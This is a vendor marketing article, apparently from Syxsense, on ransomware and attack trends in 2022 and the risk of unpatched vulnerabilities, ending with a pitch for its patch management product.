Sector-wise, all areas experienced a high volume of attacks. But Industrials (34%) were the most attacked vertical, followed by Consumer Cyclicals (18%), Healthcare (10%), and Technology (8.5%). The geographical distribution of attacks showed no surprises: North America suffered 84 attacks (45%), making it the most targeted region. Europe was next with 27%, then Asia with 14%. 

Interestingly, ransomware attacks overall were found to be 50% lower than a year before. It seems likely, therefore that 2021 will remain the highest year on record – unless there is an unprecedented upsurge in ransomware to end the year.  

Shift of Tactics  

Make no mistake. Ransomware remains a potent threat. But stepped-up law enforcement efforts, better international legal collaboration, and organizations deploying a raft of ransomware protection solutions probably combined to lessen its impact.  

The bad guys may be criminals, but they are not fools. They know what is going on. Thus, they have adjusted their tactics by increasing the volume of DDoS and launching more targeted ransomware campaigns. More than likely, 2021 was a freak year. Due to the success of ransomware in 2020, just about everyone among the cybercriminal gangs decided to get in on the act. Entire cybercrime supply chains formed up to facilitate ransomware. Lots of little outfits would probe enterprises for weaknesses. They would get a finder’s fee for passing on the details of a ripe target. More organized groups would then execute the ransomware attack and seek to collect the funds. Ransomware as a Service, too, emerged. Criminal developers created kits that could be sold to people with little or no computing experience. These developers got a cut of every successful extortion scheme.  

But the unprecedented funds raised through ransomware let to a glut in the market in 2021. Hence, the downturn in 2022. That doesn’t mean ransomware will go away. It is expected to remain an important part of the cybercrime toolkit for some time to come. But stronger defences against it mean that the bad guys will turn to tried and tested means of breaking into enterprise IT systems.  

They will scan networks looking for server, website, operating system (OS) and application vulnerabilities. They will scour the web for unpatched systems. When they find them, they will exploit them relentlessly. Bad actors know that items on the Common Exposure and Vulnerabilities (CVE) list remain weak spots in many organizations. Despite these threats being publicized broadly and patches and remediation steps being clearly laid out, a great many organizations fail to act. There are many cases on record of vulnerabilities remaining unremedied years after the issuance of a patch. We have known about Log4j, for example, for a year now yet it is still being exploited. Similarly, the Heartbleed exploit from 2014 remains something that the bad guys can exploit in some businesses.  

Syxsense Protection 

Syxsense Enterprise offers comprehensive vulnerability management, remediation, and patch management. It intelligently distributes patches with the click of a button without tying up bandwidth across the enterprise. It does this automatically, using technology that is designed to send software and patches across the wire once, using peer-to-peer within the network for local distribution.  

Further features include:  

  • Patch supersedence addresses the fact that vendors sometimes include older updates in current patches. Therefore, if a company is deploying patches sequentially, it can place the new patch at the end of the queue and not deploy it immediately while it takes care of the oldest patches. However, the new patch a) may be higher priority, and b) includes the old patch in any case. The patch supersedence features of Syxsense would deploy the new patch and not the old one.  
  • Patch Roll Back: The last thing you want is for an update to cause incompatibilities in other systems. That’s why software vendors and IT departments conduct testing to ensure patches are benign. But despite the precautions, faulty patches can occasionally happen. Syxsense includes a patch roll back feature that allows you to return your systems to the state that existed before the implementation of the new patch.  
  • Testing and release within three hours: Hackers and cybercriminals move fast. There is no time to lose in installing patches. Within a couple of hours of a patch being released, Syxsense has tested it, validated it, and has it ready for distribution.  
  • Automation: With hundreds or even thousands of endpoints to manage, manual patch distribution is too slow. Syxsense is fully automated to ensure critical patches are implemented right away. There is no need to formulate scripts, hop from one screen to another, or manually push out patches to various destinations.  

For more information, visit www.syxsense.com

Syxsense demo

Schedule Your Syxsense Demo

Syxsense combines IT management, patch management, and security vulnerability scanning in one powerful solution. Get started today.

Schedule My Demo